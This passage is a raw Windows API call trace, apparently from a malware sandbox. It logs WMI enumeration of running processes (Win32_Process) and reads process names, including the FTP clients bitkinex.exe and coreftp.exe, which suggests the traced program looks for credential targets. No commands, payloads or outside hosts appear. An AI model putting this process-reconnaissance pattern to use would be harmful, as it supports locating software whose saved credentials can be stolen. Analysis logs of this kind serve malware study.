[3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x743a28) returned 0x0 [0224.956] IUnknown:AddRef (This=0x743a28) returned 0x4 [0224.956] IUnknown:Release (This=0x743a28) returned 0x3 [0224.956] IUnknown:Release (This=0x743a28) returned 0x2 [0224.956] CoTaskMemFree (pv=0x5e8d0e8) [0224.957] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.957] IUnknown:AddRef (This=0x743a28) returned 0x3 [0224.957] IWbemClassObject:Get (in: This=0x743a28, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.957] IWbemClassObject:Get (in: This=0x743a28, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.957] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x66 [0224.957] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x66 [0224.957] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.958] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.958] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.958] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.958] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8d0e8) returned 0x0 [0224.959] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8d0e8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.959] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8d0e8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8498) returned 0x0 [0224.959] WbemDefPath:IUnknown:Release (This=0x5e8d0e8) returned 0x0 [0224.959] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8498, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8498) returned 0x0 [0224.959] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8498, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.959] WbemDefPath:IUnknown:AddRef (This=0x5eb8498) returned 0x3 [0224.959] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8498, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.959] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8498, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.959] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8498, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8d0f8) returned 0x0 [0224.959] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8d0f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.959] WbemDefPath:IUnknown:Release (This=0x5e8d0f8) returned 0x3 [0224.959] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.960] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.960] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8498, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.960] WbemDefPath:IUnknown:Release (This=0x5eb8498) returned 0x2 [0224.960] WbemDefPath:IUnknown:Release (This=0x5eb8498) returned 0x1 [0224.960] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.960] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.960] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8498, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8498) returned 0x0 [0224.960] WbemDefPath:IUnknown:AddRef (This=0x5eb8498) returned 0x3 [0224.960] WbemDefPath:IUnknown:Release (This=0x5eb8498) returned 0x2 [0224.960] WbemDefPath:IWbemPath:SetText (This=0x5eb8498, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x0 [0224.960] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.960] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.960] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.960] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.960] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.960] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.960] IWbemClassObject:Get (in: This=0x743a28, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26edce4*=0, plFlavor=0x26edce8*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitkinex.exe", varVal2=0x0), pType=0x26edce4*=8, plFlavor=0x26edce8*=0) returned 0x0 [0224.960] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0224.960] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0224.961] IWbemClassObject:Get (in: This=0x743a28, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26edce4*=8, plFlavor=0x26edce8*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitkinex.exe", varVal2=0x0), pType=0x26edce4*=8, plFlavor=0x26edce8*=0) returned 0x0 [0224.961] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0224.961] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0224.961] CoTaskMemAlloc (cb=0x4) returned 0x5e8d128 [0224.961] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8d128, puReturned=0x26dde18 | out: apObjects=0x5e8d128*=0x743bc0, puReturned=0x26dde18*=0x1) returned 0x0 [0224.962] IUnknown:QueryInterface (in: This=0x743bc0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x743bc0) returned 0x0 [0224.962] IUnknown:QueryInterface (in: This=0x743bc0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.962] IUnknown:QueryInterface (in: This=0x743bc0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.962] IUnknown:AddRef (This=0x743bc0) returned 0x3 [0224.962] IUnknown:QueryInterface (in: This=0x743bc0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.963] IUnknown:QueryInterface (in: This=0x743bc0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.963] IUnknown:QueryInterface (in: This=0x743bc0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x743bc4) returned 0x0 [0224.963] IMarshal:GetUnmarshalClass (in: This=0x743bc4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.963] IUnknown:Release (This=0x743bc4) returned 0x3 [0224.963] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.963] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.963] IUnknown:QueryInterface (in: This=0x743bc0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.963] IUnknown:Release (This=0x743bc0) returned 0x2 [0224.963] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.963] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.963] IUnknown:QueryInterface (in: This=0x743bc0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x743bc0) returned 0x0 [0224.963] IUnknown:AddRef (This=0x743bc0) returned 0x4 [0224.963] IUnknown:Release (This=0x743bc0) returned 0x3 [0224.963] IUnknown:Release (This=0x743bc0) returned 0x2 [0224.963] CoTaskMemFree (pv=0x5e8d128) [0224.963] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.963] IUnknown:AddRef (This=0x743bc0) returned 0x3 [0224.964] IWbemClassObject:Get (in: This=0x743bc0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.964] IWbemClassObject:Get (in: This=0x743bc0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.964] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"") returned 0x66 [0224.964] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"") returned 0x66 [0224.964] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.964] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.964] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.964] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.965] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8d128) returned 0x0 [0224.965] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8d128, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.965] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8d128, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8578) returned 0x0 [0224.965] WbemDefPath:IUnknown:Release (This=0x5e8d128) returned 0x0 [0224.966] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8578, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8578) returned 0x0 [0224.966] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8578, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.966] WbemDefPath:IUnknown:AddRef (This=0x5eb8578) returned 0x3 [0224.966] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8578, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.966] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8578, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.966] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8578, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8d138) returned 0x0 [0224.966] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8d138, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.966] WbemDefPath:IUnknown:Release (This=0x5e8d138) returned 0x3 [0224.966] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.966] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.966] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8578, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.966] WbemDefPath:IUnknown:Release (This=0x5eb8578) returned 0x2 [0224.966] WbemDefPath:IUnknown:Release (This=0x5eb8578) returned 0x1 [0224.966] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.966] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.966] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8578, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8578) returned 0x0 [0224.967] WbemDefPath:IUnknown:AddRef (This=0x5eb8578) returned 0x3 [0224.967] WbemDefPath:IUnknown:Release (This=0x5eb8578) returned 0x2 [0224.967] WbemDefPath:IWbemPath:SetText (This=0x5eb8578, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"") returned 0x0 [0224.967] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.967] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.967] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.967] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.967] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.967] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.967] IWbemClassObject:Get (in: This=0x743bc0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ee558*=0, plFlavor=0x26ee55c*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="coreftp.exe", varVal2=0x0), pType=0x26ee558*=8, plFlavor=0x26ee55c*=0) returned 0x0 [0224.967] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0224.967] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0224.967] IWbemClassObject:Get (in: This=0x743bc0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ee558*=8, plFlavor=0x26ee55c*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="coreftp.exe", varVal2=0x0), pType=0x26ee558*=8, plFlavor=0x26ee55c*=0) returned 0x0 [0224.967] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0224.967] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0224.968] CoTaskMemAlloc (cb=0x4) returned 0x5e8d168 [0224.968] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8d168, puReturned=0x26dde18 | out: apObjects=0x5e8d168*=0x5ebb200, puReturned=0x26dde18*=0x1) returned 0x0 [0224.969] IUnknown:QueryInterface (in: This=0x5ebb200, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebb200) returned 0x0 [0224.969] IUnknown:QueryInterface (in: This=0x5ebb200, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.969] IUnknown:QueryInterface (in: This=0x5ebb200, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.969] IUnknown:AddRef (This=0x5ebb200) returned 0x3 [0224.969] IUnknown:QueryInterface (in: This=0x5ebb200, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.969] IUnknown:QueryInterface (in: This=0x5ebb200, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.969] IUnknown:QueryInterface (in: This=0x5ebb200, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebb204) returned 0x0 [0224.969] IMarshal:GetUnmarshalClass (in: This=0x5ebb204, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, 